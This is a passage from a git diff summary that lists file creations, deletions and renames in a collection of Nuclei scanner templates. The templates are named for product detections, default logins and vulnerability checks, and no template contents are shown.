nuclei-templates/Other/node-integration-enabled-9137.yaml rename nuclei-templates/Other/{node-red-detect.yaml => node-red-detect-9139.yaml} (100%) create mode 100644 nuclei-templates/Other/notebook.yaml delete mode 100644 nuclei-templates/Other/npm-log-file-9141.yaml create mode 100644 nuclei-templates/Other/npm-log-file.yaml rename nuclei-templates/Other/{nps-default-login-9145.yaml => nps-default-login-9142.yaml} (100%) create mode 100644 nuclei-templates/Other/ns-asg.yaml create mode 100644 nuclei-templates/Other/nuuno-network-login-9161.yaml delete mode 100644 nuclei-templates/Other/nuuno-network-login.yaml create mode 100644 nuclei-templates/Other/nuuo-nvrmini2-rce-9170.yaml delete mode 100644 nuclei-templates/Other/nuuo-nvrmini2-rce-9171.yaml create mode 100644 nuclei-templates/Other/o2oa.yaml rename nuclei-templates/Other/{oa-tongda-path-traversal.yaml => oa-tongda-path-traversal-9178.yaml} (100%) create mode 100644 nuclei-templates/Other/oa-v9-uploads-file-9191.yaml delete mode 100644 nuclei-templates/Other/oa-v9-uploads-file.yaml create mode 100644 nuclei-templates/Other/oauth-access-key-9184.yaml delete mode 100755 nuclei-templates/Other/oauth-access-key-9186.yaml rename nuclei-templates/Other/{oauth2-detect-9183.yaml => oauth2-detect.yaml} (100%) create mode 100644 nuclei-templates/Other/octobercms-default-login-9192.yaml delete mode 100644 nuclei-templates/Other/octobercms-default-login-9193.yaml rename nuclei-templates/Other/{octobercms-detect.yaml => octobercms-detect-9195.yaml} (100%) rename nuclei-templates/Other/{octoprint-login.yaml => octoprint-login-9198.yaml} (100%) rename nuclei-templates/Other/{odoo-cms-redirect.yaml => odoo-cms-redirect-9199.yaml} (100%) create mode 100644 nuclei-templates/Other/ofbiz-default-login-9208.yaml delete mode 100644 nuclei-templates/Other/ofbiz-default-login.yaml create mode 100644 nuclei-templates/Other/office-documents-links.yaml rename nuclei-templates/Other/{office365-open-redirect-9215.yaml => office365-open-redirect-9214.yaml} (100%) create mode 100644 nuclei-templates/Other/office_anywhere.yaml create mode 100644 nuclei-templates/Other/office_web_apps_server.yaml delete mode 100644 nuclei-templates/Other/officedocuments.yaml rename nuclei-templates/Other/{oipm-detect-9219.yaml => oipm-detect-9221.yaml} (100%) create mode 100644 nuclei-templates/Other/okiko-sfiler-portal-9230.yaml delete mode 100644 nuclei-templates/Other/okiko-sfiler-portal.yaml delete mode 100644 nuclei-templates/Other/okta-panel-9234.yaml create mode 100644 nuclei-templates/Other/okta-panel.yaml create mode 100644 nuclei-templates/Other/old-copyright-9236.yaml delete mode 100644 nuclei-templates/Other/old-copyright.yaml delete mode 100644 nuclei-templates/Other/oliver-library-lfi-9239.yaml create mode 100644 nuclei-templates/Other/oliver-library-lfi-9241.yaml delete mode 100644 nuclei-templates/Other/olivetti-crf-detect-9244.yaml create mode 100644 nuclei-templates/Other/olivetti-crf-detect.yaml create mode 100644 nuclei-templates/Other/ollama.yaml delete mode 100644 nuclei-templates/Other/one_line_checks_nuclei.yaml create mode 100644 nuclei-templates/Other/onliner-multiple-bugs.yaml rename nuclei-templates/Other/{opcache-status-exposure-9255.yaml => opcache-status-exposure-9254.yaml} (100%) delete mode 100644 nuclei-templates/Other/open-game-panel-9279.yaml create mode 100644 nuclei-templates/Other/open-game-panel.yaml mode change 100755 => 100644 nuclei-templates/Other/open-mjpg-streamer-9284.yaml delete mode 100644 nuclei-templates/Other/open-proxy-internal-9288.yaml create mode 100644 nuclei-templates/Other/open-proxy-internal.yaml rename nuclei-templates/Other/{open-proxy-localhost-9293.yaml => open-proxy-localhost.yaml} (100%) create mode 100644 nuclei-templates/Other/open-redirect-9309.yaml create mode 100644 nuclei-templates/Other/open-redirect-plus.yaml delete mode 100644 nuclei-templates/Other/open-redirect.yaml delete mode 100644 nuclei-templates/Other/open-redirect2.yaml create mode 100644 nuclei-templates/Other/open-stack-dashboard-login-9324.yaml delete mode 100644 nuclei-templates/Other/open-stack-dashboard-login.yaml rename nuclei-templates/Other/{open-virtualization-manager-detect.yaml => open-virtualization-manager-detect-9325.yaml} (100%) delete mode 100644 nuclei-templates/Other/open-virtualization-manager-panel-9328.yaml create mode 100644 nuclei-templates/Other/open-virtualization-manager-panel.yaml rename nuclei-templates/Other/{openam-workflow.yaml => openam-workflow-9259.yaml} (100%) rename nuclei-templates/Other/{openbmcs-secret-disclosure.yaml => openbmcs-secret-disclosure-9260.yaml} (100%) rename nuclei-templates/Other/{openbmcs-ssrf.yaml => openbmcs-ssrf-9261.yaml} (100%) create mode 100644 nuclei-templates/Other/opencast-detect-9263.yaml delete mode 100644 nuclei-templates/Other/opencast-detect.yaml create mode 100644 nuclei-templates/Other/opencti-lfi-9268.yaml delete mode 100644 nuclei-templates/Other/opencti-lfi.yaml create mode 100644 nuclei-templates/Other/openemr-default-login-9269.yaml delete mode 100644 nuclei-templates/Other/openemr-default-login.yaml create mode 100644 nuclei-templates/Other/openemr-detect-9271.yaml delete mode 100644 nuclei-templates/Other/openemr-detect.yaml delete mode 100644 nuclei-templates/Other/openerp-database-9275.yaml create mode 100644 nuclei-templates/Other/openerp-database.yaml delete mode 100644 nuclei-templates/Other/opengear-detect.yaml create mode 100644 nuclei-templates/Other/openmediavault.yaml rename nuclei-templates/Other/{opennms-web-console.yaml => opennms-web-console-9287.yaml} (100%) create mode 100644 nuclei-templates/Other/openshift_origin.yaml delete mode 100644 nuclei-templates/Other/opensis-detect-9314.yaml create mode 100644 nuclei-templates/Other/opensis-lfi-9315.yaml delete mode 100644 nuclei-templates/Other/opensis-lfi.yaml create mode 100644 nuclei-templates/Other/opensis-panel.yaml rename nuclei-templates/Other/{opensis-workflow-9319.yaml => opensis-workflow.yaml} (100%) rename nuclei-templates/Other/{openvpn-hhi.yaml => openvpn-hhi-9329.yaml} (100%) delete mode 100644 nuclei-templates/Other/openvpn-monitor-9331.yaml create mode 100644 nuclei-templates/Other/openvpn-monitor.yaml create mode 100644 nuclei-templates/Other/openwrt-default-login-9332.yaml delete mode 100644 nuclei-templates/Other/openwrt-default-login.yaml delete mode 100644 nuclei-templates/Other/openwrt-login-9333.yaml create mode 100644 nuclei-templates/Other/openwrt-login.yaml delete mode 100644 nuclei-templates/Other/openx-detect-9334.yaml create mode 100644 nuclei-templates/Other/openx-detect.yaml create mode 100644 nuclei-templates/Other/operations-automation-default-page-9337.yaml delete mode 100644 nuclei-templates/Other/operations-automation-default-page.yaml create mode 100644 nuclei-templates/Other/optilink-ont1gew-gpon-rce-9342.yaml delete mode 100644 nuclei-templates/Other/optilink-ont1gew-gpon-rce.yaml rename nuclei-templates/Other/{oracle-business-control.yaml => oracle-business-control-9347.yaml} (100%) delete mode 100644 nuclei-templates/Other/oracle-dbcs-9353.yaml create mode 100644 nuclei-templates/Other/oracle-dbcs.yaml create mode 100644 nuclei-templates/Other/oracle-ebs-bispgraph-file-access-9358.yaml delete mode 100644 nuclei-templates/Other/oracle-ebs-bispgraph-file-access.yaml rename nuclei-templates/Other/{oracle-ebs-credentials.yaml => oracle-ebs-credentials-9365.yaml} (100%) create mode 100644 nuclei-templates/Other/oracle-ebs-credentials-disclosure.yaml create mode 100644 nuclei-templates/Other/oracle-ebs-sqllog-disclosure-9371.yaml delete mode 100644 nuclei-templates/Other/oracle-ebs-sqllog-disclosure.yaml create mode 100644 nuclei-templates/Other/oracle-ebs-xss-9375.yaml delete mode 100644 nuclei-templates/Other/oracle-ebs-xss-9376.yaml delete mode 100644 nuclei-templates/Other/oracle-fatwire-lfi-9378.yaml create mode 100644 nuclei-templates/Other/oracle-fatwire-lfi.yaml create mode 100644 nuclei-templates/Other/oracle-httpserver-12c.yaml delete mode 100644 nuclei-templates/Other/oracle-httpserver12c.yaml delete mode 100644 nuclei-templates/Other/oracle-integrated-manager-9386.yaml create mode 100644 nuclei-templates/Other/oracle-integrated-manager.yaml rename nuclei-templates/Other/{oracle-iplanet-web-server.yaml => oracle-iplanet-web-server-9392.yaml} (100%) create mode 100644 nuclei-templates/Other/oracle-oam-xss(1).yaml delete mode 100644 nuclei-templates/Other/oracle-people-enterprise-9398.yaml create mode 100644 nuclei-templates/Other/oracle-people-enterprise.yaml delete mode 100644 nuclei-templates/Other/oracle-people-sign-in-9399.yaml create mode 100644 nuclei-templates/Other/oracle-people-sign-in.yaml rename nuclei-templates/Other/{oracle-siebel-xss.yaml => oracle-siebel-xss-9402.yaml} (100%) rename nuclei-templates/Other/{oracle-tns-listner.yaml => oracle-tns-listener.yaml} (100%) rename nuclei-templates/Other/{orbiteam-bscw-server-lfi.yaml => orbiteam-bscw-server-lfi-9404.yaml} (100%) create mode 100644 nuclei-templates/Other/oscommerce-rce-9408.yaml delete mode 100644 nuclei-templates/Other/oscommerce-rce.yaml rename nuclei-templates/Other/{otobo-open-redirect.yaml => otobo-open-redirect-9411.yaml} (100%) create mode 100644 nuclei-templates/Other/otobo-panel-9412.yaml delete mode 100644 nuclei-templates/Other/otobo-panel.yaml create mode 100644 nuclei-templates/Other/owasp-juice-shop-detected-9418.yaml delete mode 100644 nuclei-templates/Other/owasp-juice-shop-detected.yaml rename nuclei-templates/Other/{owncloud-config.yaml => owncloud-config-9420.yaml} (100%) rename nuclei-templates/Other/{package-json-9421.yaml => package-json-9423.yaml} (100%) create mode 100644 nuclei-templates/Other/pacs-connexion-utilisateur-9424.yaml delete mode 100644 nuclei-templates/Other/pacs-connexion-utilisateur.yaml create mode 100644 nuclei-templates/Other/pacsone-server-lfi-9430.yaml delete mode 100644 nuclei-templates/Other/pacsone-server-lfi.yaml rename nuclei-templates/Other/{api-pagerduty-475.yaml => pagerduty.yaml} (100%) rename nuclei-templates/Other/{pagewiz-takeover.yaml => pagewiz-takeover-9436.yaml} (100%) rename nuclei-templates/Other/{panabit-default-password.yaml => panabit-default-password-9441.yaml} (100%) rename nuclei-templates/Other/{Panabit-sy_addmount-rce.yaml => panabit-sy_addmount-rce.yaml} (100%) rename nuclei-templates/Other/{panalog-fileread.yaml => panalog-fileRead.yaml} (100%) create mode 100644 nuclei-templates/Other/panasonic-network-management-9450.yaml delete mode 100644 nuclei-templates/Other/panasonic-network-management.yaml create mode 100644 nuclei-templates/Other/pandora-fms-console-9451.yaml delete mode 100644 nuclei-templates/Other/pandora-fms-console.yaml rename nuclei-templates/Other/{panos-default-login.yaml => panos-default-login-9454.yaml} (100%) delete mode 100644 nuclei-templates/Other/parallels-html-client-9462.yaml create mode 100644 nuclei-templates/Other/parallels-html-client.yaml create mode 100644 nuclei-templates/Other/parameters-config-9465.yaml delete mode 100644 nuclei-templates/Other/parameters-config.yaml create mode 100644 nuclei-templates/Other/path-traversal.yaml rename nuclei-templates/Other/{paypal-braintree-token.yaml => paypal-braintree-token-11856.yaml} (100%) delete mode 100644 nuclei-templates/Other/pbootcms-database-file-download-9469.yaml create mode 100644 nuclei-templates/Other/pbootcms-database-file-download.yaml create mode 100644 nuclei-templates/Other/pdf-signer-ssti-to-rce-9470.yaml delete mode 100644 nuclei-templates/Other/pdf-signer-ssti-to-rce.yaml create mode 100644 nuclei-templates/Other/pdf-thumbnail-generator.yaml rename nuclei-templates/Other/{pega-detect.yaml => pega-detect-9474.yaml} (100%) create mode 100644 nuclei-templates/Other/pelco_videoxpert.yaml rename nuclei-templates/Other/{pentaho-default-login.yaml => pentaho-default-login-9478.yaml} (100%) rename nuclei-templates/Other/{pentaho-panel-9483.yaml => pentaho-panel-9481.yaml} (100%) create mode 100644 nuclei-templates/Other/peoplesoft_enterprise_peopletools.yaml rename nuclei-templates/Other/{perl-scanner.yaml => perl-scanner-9484.yaml} (100%) delete mode 100644 nuclei-templates/Other/perl-status-9487.yaml create mode 100644 nuclei-templates/Other/perl-status.yaml delete mode 100644 nuclei-templates/Other/pgadmin-exposure-9488.yaml create mode 100644 nuclei-templates/Other/pgadmin-exposure.yaml rename nuclei-templates/Other/{phalcon-framework-source-9494.yaml => phalcon-framework-source-9495.yaml} (100%) delete mode 100644 nuclei-templates/Other/phoronix-pane.yaml create mode 100644 nuclei-templates/Other/phoronix-panel.yaml delete mode 100644 nuclei-templates/Other/php-backup-files-9497.yaml create mode 100644 nuclei-templates/Other/php-backup-files.yaml rename nuclei-templates/Other/{php-debug-bar.yaml => php-debug-bar-9506.yaml} (100%) create mode 100644 nuclei-templates/Other/php-errors-9511.yaml delete mode 100644 nuclei-templates/Other/php-errors.yaml delete mode 100644 nuclei-templates/Other/php-ini-9523.yaml create mode 100644 nuclei-templates/Other/php-ini.yaml create mode 100644 nuclei-templates/Other/php-proxy-detect-9544.yaml delete mode 100644 nuclei-templates/Other/php-proxy-detect.yaml create mode 100644 nuclei-templates/Other/php-timeclock-xss-9554.yaml delete mode 100644 nuclei-templates/Other/php-timeclock-xss.yaml rename nuclei-templates/Other/{php-user-ini-disclosure.yaml => php-user-ini-disclosure-9559.yaml} (100%) delete mode 100644 nuclei-templates/Other/phpMyAdmin-setup.yaml rename nuclei-templates/Other/{phpcollab-detect-9499.yaml => phpcollab-detect-9501.yaml} (100%) delete mode 100644 nuclei-templates/Other/phpinfo-9517.yaml create mode 100644 nuclei-templates/Other/phpinfo-9521.yaml create mode 100644 nuclei-templates/Other/phpmyadmin-panel-9526.yaml delete mode 100644 nuclei-templates/Other/phpmyadmin-panel-9528.yaml rename nuclei-templates/Other/{pma-server-import.yaml => phpmyadmin-server-import.yaml} (100%) create mode 100644 nuclei-templates/Other/phpmyadmin-setup-9531.yaml create mode 100644 nuclei-templates/Other/phpok-sqli-9538.yaml delete mode 100644 nuclei-templates/Other/phppgadmin-panel-9539.yaml create mode 100644 nuclei-templates/Other/phppgadmin-panel-9542.yaml delete mode 100644 nuclei-templates/Other/phpunit-9557.yaml create mode 100644 nuclei-templates/Other/phpunit.yaml create mode 100644 nuclei-templates/Other/phpwiki-lfi-9564.yaml delete mode 100644 nuclei-templates/Other/phpwiki-lfi-9568.yaml rename nuclei-templates/Other/{pi-hole-detect.yaml => pi-hole-detect-9581.yaml} (100%) rename nuclei-templates/Other/{Pictatic-API-key.yaml => pictatic-api-key-9576.yaml} (100%) delete mode 100644 nuclei-templates/Other/pieregister-plugin-open-redirect.yaml create mode 100644 nuclei-templates/Other/pikpikcussti.yaml create mode 100644 nuclei-templates/Other/pingdom-takeover-9585.yaml delete mode 100644 nuclei-templates/Other/pingdom-takeover.yaml create mode 100644 nuclei-templates/Other/pinpoint-unauth-9590.yaml delete mode 100644 nuclei-templates/Other/pinpoint-unauth.yaml delete mode 100644 nuclei-templates/Other/plesk-onyx-login.yaml create mode 100644 nuclei-templates/Other/plesk-onyx.yaml rename nuclei-templates/Other/{plesk-stat.yaml => plesk-stat-9604.yaml} (100%) create mode 100644 nuclei-templates/Other/plone-cms-detect-9607.yaml delete mode 100644 nuclei-templates/Other/plone-cms-detect.yaml delete mode 100644 nuclei-templates/Other/plugin.yaml create mode 100644 nuclei-templates/Other/pmb-directory-traversal-9611.yaml delete mode 100644 nuclei-templates/Other/pmb-directory-traversal.yaml delete mode 100644 nuclei-templates/Other/pollbot-redirect-9622.yaml create mode 100644 nuclei-templates/Other/pollbot-redirect.yaml rename nuclei-templates/Other/{polycom-login.yaml => polycom-login-9627.yaml} (100%) rename nuclei-templates/Other/{portainer-init-deploy.yaml => portainer-init-deploy-9628.yaml} (100%) create mode 100644 nuclei-templates/Other/possible-AEM-secrets.yaml delete mode 100644 nuclei-templates/Other/postmessage-outgoing-tracker-9636.yaml create mode 100644 nuclei-templates/Other/postmessage-outgoing-tracker.yaml create mode 100644 nuclei-templates/Other/postmessage-tracker-9639.yaml delete mode 100644 nuclei-templates/Other/postmessage-tracker.yaml create mode 100644 nuclei-templates/Other/powercreator-cms-rce-9644.yaml delete mode 100644 nuclei-templates/Other/powercreator-cms-rce.yaml rename nuclei-templates/Other/{powerlogic-ion.yaml => powerlogic-ion-9648.yaml} (100%) rename nuclei-templates/Other/{prestashop-detect.yaml => prestashop-detect-9651.yaml} (100%) create mode 100644 nuclei-templates/Other/prison_management_system.yaml rename nuclei-templates/Other/{private-key-9655.yaml => private-key-9656.yaml} (100%) create mode 100644 nuclei-templates/Other/processmaker-lfi-9659.yaml delete mode 100644 nuclei-templates/Other/processmaker-lfi.yaml create mode 100644 nuclei-templates/Other/production-logs-9664.yaml delete mode 100644 nuclei-templates/Other/production-logs.yaml delete mode 100644 nuclei-templates/Other/prometheus-exporter-detect-9676.yaml create mode 100644 nuclei-templates/Other/prometheus-exporter-detect.yaml rename nuclei-templates/Other/{prometheus-flags.yaml => prometheus-flags-9687.yaml} (100%) create mode 100644 nuclei-templates/Other/prometheus-flags-endpoint-9685.yaml create mode 100644 nuclei-templates/Other/prometheus-targets-9690.yaml create mode 100644 nuclei-templates/Other/prometheus-targets-endpoint.yaml delete mode 100644 nuclei-templates/Other/prometheus-targets.yaml create mode 100644 nuclei-templates/Other/promothoues-panel (copy 1).yaml delete mode 100644 nuclei-templates/Other/promothoues-panel.yaml create mode 100644 nuclei-templates/Other/proposify-takeover-9695.yaml delete mode 100644 nuclei-templates/Other/proposify-takeover.yaml delete mode 100644 nuclei-templates/Other/prototype-pollution-check-9697.yaml create mode 100644 nuclei-templates/Other/prototype-pollution-check.yaml rename nuclei-templates/Other/{provider-path-9702.yaml => provider-path.yaml} (100%) rename nuclei-templates/Other/{prtg-detect-9703.yaml => prtg-detect-9706.yaml} (100%) rename nuclei-templates/Other/{ptr-fingerprint.yaml => ptr-fingerprint-9707.yaml} (100%) delete mode 100644 nuclei-templates/Other/pulse-secure-panel-9714.yaml create mode 100644 nuclei-templates/Other/pulse-secure-panel.yaml rename nuclei-templates/Other/{puppet-node-manager-detect.yaml => puppet-node-manager-detect-9720.yaml} (100%) create mode 100644 nuclei-templates/Other/puppetboard-panel-9716.yaml delete mode 100644 nuclei-templates/Other/puppetboard-panel.yaml create mode 100644 nuclei-templates/Other/puppetserver-detect-9721.yaml delete mode 100644 nuclei-templates/Other/puppetserver-detect.yaml delete mode 100644 nuclei-templates/Other/put-m-enb.yaml create mode 100644 nuclei-templates/Other/put-method-enabled.yaml create mode 100644 nuclei-templates/Other/putMethod-1.yaml create mode 100644 nuclei-templates/Other/putMethod-2.yaml rename nuclei-templates/Other/{putty-private-key-disclosure-9731.yaml => putty-private-key-disclosure.yaml} (100%) create mode 100644 nuclei-templates/Other/pypicloud-panel-9734.yaml delete mode 100644 nuclei-templates/Other/pypicloud-panel.yaml rename nuclei-templates/Other/{pyproject-disclosure-9736.yaml => pyproject-disclosure-9737.yaml} (100%) rename nuclei-templates/Other/{pyspider-unauthorized-access.yaml => pyspider-unauthorized-access-9743.yaml} (100%) rename nuclei-templates/Other/{python-app-sql-exceptions.yaml => python-app-sql-exceptions-9744.yaml} (100%) create mode 100644 nuclei-templates/Other/python-metrics-9747.yaml delete mode 100644 nuclei-templates/Other/python-metrics.yaml create mode 100644 nuclei-templates/Other/qdpm-info-leak-9754.yaml delete mode 100644 nuclei-templates/Other/qdpm-info-leak.yaml rename nuclei-templates/Other/{qi-anxin-netkang-next-generation-firewall-rce-9757.yaml => qi-anxin-netkang-next-generation-firewall-rce-9755.yaml} (100%) create mode 100644 nuclei-templates/Other/qihang-media-disclosure-9762.yaml delete mode 100644 nuclei-templates/Other/qihang-media-disclosure-9764.yaml rename nuclei-templates/Other/{2378487680.yaml => quasar.yaml} (100%) create mode 100644 nuclei-templates/Other/qvisdvr-deserialization-rce-9774.yaml delete mode 100644 nuclei-templates/Other/qvisdvr-deserialization-rce.yaml delete mode 100644 nuclei-templates/Other/r-webserver-login-9956.yaml create mode 100644 nuclei-templates/Other/r-webserver-login.yaml delete mode 100644 nuclei-templates/Other/rabbitmq-dashboard-9776.yaml create mode 100644 nuclei-templates/Other/rabbitmq-dashboard-9779.yaml delete mode 100644 nuclei-templates/Other/rabbitmq-default-admin-9782.yaml create mode 100644 nuclei-templates/Other/rabbitmq-default-admin.yaml rename nuclei-templates/Other/{rabbitmq-default-login.yaml => rabbitmq-default-login-9783.yaml} (100%) create mode 100644 nuclei-templates/Other/rack-mini-profiler-9792.yaml delete mode 100644 nuclei-templates/Other/rack-mini-profiler.yaml create mode 100644 nuclei-templates/Other/raidenmaild.yaml create mode 100644 nuclei-templates/Other/rails-secret-token-disclosure-9810.yaml delete mode 100644 nuclei-templates/Other/rails-secret-token-disclosure.yaml rename nuclei-templates/Other/{rails6-xss-9797.yaml => rails6-xss-9798.yaml} (100%) create mode 100644 nuclei-templates/Other/rainloop-default-login-9811.yaml delete mode 100644 nuclei-templates/Other/rainloop-default-login.yaml rename nuclei-templates/Other/{rancher-default-login.yaml => rancher-default-login-9816.yaml} (100%) create mode 100644 nuclei-templates/Other/ranger-default-login-9827.yaml delete mode 100644 nuclei-templates/Other/ranger-default-login.yaml create mode 100644 nuclei-templates/Other/ranger.yaml delete mode 100644 nuclei-templates/Other/rce-shellshock-user-agent-9831.yaml create mode 100644 nuclei-templates/Other/rce-shellshock-user-agent-9833.yaml create mode 100644 nuclei-templates/Other/rconfig-file-upload.yaml rename nuclei-templates/Other/{rdp-detect.yaml => rdp-detect-9839.yaml} (100%) create mode 100644 nuclei-templates/Other/readme-takeover-9843.yaml delete mode 100644 nuclei-templates/Other/readme-takeover.yaml rename nuclei-templates/Other/{readthedocs-takeover.yaml => readthedocs-takeover-9846.yaml} (100%) delete mode 100644 nuclei-templates/Other/redash-detection.yaml create mode 100644 nuclei-templates/Other/redash-panel.yaml create mode 100644 nuclei-templates/Other/redis.yaml delete mode 100644 nuclei-templates/Other/reflected-xss.yaml delete mode 100644 nuclei-templates/Other/reflection-ssti.yaml rename nuclei-templates/Other/{remkon-manager-detect.yaml => remkon-manager-detect-9857.yaml} (100%) create mode 100644 nuclei-templates/Other/remote-ui-login-9861.yaml delete mode 100644 nuclei-templates/Other/remote-ui-login.yaml create mode 100644 nuclei-templates/Other/remote_support.yaml rename nuclei-templates/Other/{resin-inputfile-fileread-9871.yaml => resin-inputfile-fileread-9868.yaml} (100%) create mode 100644 nuclei-templates/Other/resin-viewfile-lfr-9875.yaml delete mode 100644 nuclei-templates/Other/resin-viewfile-lfr.yaml delete mode 100644 nuclei-templates/Other/response-ssrf.yaml create mode 100644 nuclei-templates/Other/rg-uac.yaml create mode 100644 nuclei-templates/Other/rg-uac_firmware.yaml rename nuclei-templates/Other/{rhymix-cms-detect.yaml => rhymix-cms-detect-9877.yaml} (100%) rename nuclei-templates/Other/{ricoh-weak-password.yaml => ricoh-weak-password-9883.yaml} (100%) delete mode 100644 nuclei-templates/Other/robomongo-credential-9885.yaml create mode 100644 nuclei-templates/Other/robomongo-credential.yaml create mode 100644 nuclei-templates/Other/robots-9887.yaml delete mode 100644 nuclei-templates/Other/robots.txt.yaml rename nuclei-templates/Other/{rocketmq-console-exposure.yaml => rocketmq-console-exposure-9894.yaml} (100%) rename nuclei-templates/Other/{rockmongo-default-login-9900.yaml => rockmongo-default-login-9899.yaml} (100%) rename nuclei-templates/Other/{rockmongo-xss.yaml => rockmongo-xss-9902.yaml} (100%) delete mode 100644 nuclei-templates/Other/roundcube-log-disclosure-9905.yaml create mode 100644 nuclei-templates/Other/roundcube-log-disclosure-9906.yaml delete mode 100644 nuclei-templates/Other/rsa-self-service-9910.yaml create mode 100644 nuclei-templates/Other/rsa-self-service-9912.yaml delete mode 100644 nuclei-templates/Other/rseenet-default-login-9913.yaml create mode 100644 nuclei-templates/Other/rseenet-default-login.yaml rename nuclei-templates/Other/{rseenet-detect.yaml => rseenet-detect-9916.yaml} (100%) rename nuclei-templates/Other/{rstudio-detect.yaml => rstudio-detect-9919.yaml} (100%) create mode 100644 nuclei-templates/Other/rt-n16.yaml delete mode 100644 nuclei-templates/Other/ruby-open-rce.yaml rename nuclei-templates/Other/{Ruijie-EG-passLeak.yaml => ruijie-eg-passleak.yaml} (100%) create mode 100644 nuclei-templates/Other/ruijie-eg-password-leak-9922.yaml delete mode 100644 nuclei-templates/Other/ruijie-eg-password-leak.yaml create mode 100644 nuclei-templates/Other/ruijie-eg-rce-9925.yaml delete mode 100644 nuclei-templates/Other/ruijie-eg-rce-9929.yaml create mode 100644 nuclei-templates/Other/ruijie-information-disclosure-9931.yaml delete mode 100644 nuclei-templates/Other/ruijie-information-disclosure.yaml rename nuclei-templates/Other/{ruijie-nbr1300g-exposure.yaml => ruijie-nbr1300g-exposure-9936.yaml} (100%) create mode 100644 nuclei-templates/Other/ruijie-networks-lfi-9941.yaml delete mode 100644 nuclei-templates/Other/ruijie-networks-lfi.yaml create mode 100644 nuclei-templates/Other/ruijie-phpinfo-9952.yaml delete mode 100644 nuclei-templates/Other/ruijie-phpinfo.yaml create mode 100644 nuclei-templates/Other/rundeck.yaml rename nuclei-templates/Other/{nuclei_template.yaml => rxss.yaml} (100%) create mode 100644 nuclei-templates/Other/s14.yaml rename nuclei-templates/Other/{s3-detect-9964.yaml => s3-detect-9963.yaml} (100%) create mode 100644 nuclei-templates/Other/s3-subtakeover-9968.yaml delete mode 100644 nuclei-templates/Other/s3-subtakeover-9969.yaml delete mode 100644 nuclei-templates/Other/s3hunter-9966.yaml create mode 100644 nuclei-templates/Other/s3hunter.yaml create mode 100644 nuclei-templates/Other/salesforce-aura-9983.yaml delete mode 100644 nuclei-templates/Other/salesforce-aura.yaml create mode 100644 nuclei-templates/Other/samba-config-9987.yaml delete mode 100644 nuclei-templates/Other/samba-config.yaml delete mode 100644 nuclei-templates/Other/samba-detect-9990.yaml create mode 100644 nuclei-templates/Other/samba-detect.yaml rename nuclei-templates/Other/{samba-swat-panel.yaml => samba-swat-panel-9991.yaml} (100%) delete mode 100644 nuclei-templates/Other/samsung-printer-detect-9993.yaml create mode 100644 nuclei-templates/Other/samsung-printer-detect.yaml rename nuclei-templates/Other/{samsung-wlan-ap-default-credentials.yaml => samsung-wlan-ap-default-credentials-9995.yaml} (100%) create mode 100644 nuclei-templates/Other/samsung-wlan-default-login-10017.yaml delete mode 100644 nuclei-templates/Other/samsung-wlan-default-login.yaml rename nuclei-templates/Other/{sangfor-BA-rce.yaml => sangfor-ba-rce-10020.yaml} (100%) delete mode 100644 nuclei-templates/Other/sangfor-edr-rce-10025.yaml create mode 100644 nuclei-templates/Other/sangfor-edr-rce-10029.yaml create mode 100644 nuclei-templates/Other/sangfor.yaml rename nuclei-templates/Other/{sap-hana-xsengine-panel.yaml => sap-hana-xsengine-panel-10037.yaml} (100%) delete mode 100644 nuclei-templates/Other/sap-igs-detect-10039.yaml create mode 100644 nuclei-templates/Other/sap-igs-detect.yaml rename nuclei-templates/Other/{sap-netweaver-detect.yaml => sap-netweaver-detect-10046.yaml} (100%) create mode 100644 nuclei-templates/Other/sap-netweaver-info-leak-10051.yaml delete mode 100644 nuclei-templates/Other/sap-netweaver-info-leak.yaml create mode 100644 nuclei-templates/Other/sap-netweaver-rce.yaml create mode 100644 nuclei-templates/Other/sap-netweaver-webgui-10059.yaml delete mode 100644 nuclei-templates/Other/sap-netweaver-webgui.yaml create mode 100644 nuclei-templates/Other/sap-redirect-10064.yaml rename nuclei-templates/Other/{sap-web-dispatcher-10078.yaml => sap-web-dispatcher-10075.yaml} (100%) rename nuclei-templates/Other/{sapfiori-panel.yaml => sapfiori-panel-10033.yaml} (100%) delete mode 100644 nuclei-templates/Other/sar2html-rce-10082.yaml create mode 100644 nuclei-templates/Other/sar2html-rce.yaml create mode 100644 nuclei-templates/Other/sauter-login-10088.yaml delete mode 100644 nuclei-templates/Other/sauter-login.yaml delete mode 100644 nuclei-templates/Other/sceditor-detect-10093.yaml create mode 100644 nuclei-templates/Other/sceditor-detect-10094.yaml create mode 100644 nuclei-templates/Other/scs-landfill-control-10098.yaml delete mode 100644 nuclei-templates/Other/scs-landfill-control.yaml create mode 100644 nuclei-templates/Other/scx-6555n.yaml create mode 100644 nuclei-templates/Other/seacms-rce-10102.yaml delete mode 100644 nuclei-templates/Other/seacms-rce.yaml delete mode 100644 nuclei-templates/Other/seacms-sqli-10103.yaml create mode 100644 nuclei-templates/Other/seacms-sqli.yaml rename nuclei-templates/Other/{Seagate-media-sqli.yaml => seagate-media-sqli.yaml} (100%) delete mode 100644 nuclei-templates/Other/searchbar.yaml create mode 100644 nuclei-templates/Other/searches.yaml create mode 100644 nuclei-templates/Other/seats-login-10107.yaml delete mode 100644 nuclei-templates/Other/seats-login.yaml create mode 100644 nuclei-templates/Other/secmail-detect-10111.yaml delete mode 100644 nuclei-templates/Other/secmail-detect.yaml rename nuclei-templates/Other/{secnet-ac-default-login.yaml => secnet-ac-default-login-10113.yaml} (100%) create mode 100644 nuclei-templates/Other/secure-downloads.yaml delete mode 100644 nuclei-templates/Other/securenvoy-panel-10116.yaml create mode 100644 nuclei-templates/Other/securenvoy-panel.yaml create mode 100644 nuclei-templates/Other/securityspy-detect-10119.yaml delete mode 100644 nuclei-templates/Other/securityspy-detect-10121.yaml create mode 100644 nuclei-templates/Other/seeddms-default-login-10128.yaml delete mode 100644 nuclei-templates/Other/seeddms-default-login.yaml delete mode 100644 nuclei-templates/Other/seeddms-detect-10131.yaml create mode 100644 nuclei-templates/Other/seeddms-detect.yaml create mode 100644 nuclei-templates/Other/seeddms.yaml create mode 100644 nuclei-templates/Other/selea-ip-camera-10136.yaml delete mode 100644 nuclei-templates/Other/selea-ip-camera.yaml delete mode 100644 nuclei-templates/Other/selenium-exposure-10137.yaml create mode 100644 nuclei-templates/Other/selenium-exposure-10138.yaml create mode 100644 nuclei-templates/Other/self_service.yaml create mode 100644 nuclei-templates/Other/senayan_library_management_system.yaml rename nuclei-templates/Other/{sendgrid-api(1).yaml => sendgrid-api-11859.yaml} (100%) rename nuclei-templates/Other/{nuxt_fs.yaml => sensei-message-wp.yaml} (100%) create mode 100644 nuclei-templates/Other/sensitive-storage-data-exposure-1.yaml create mode 100644 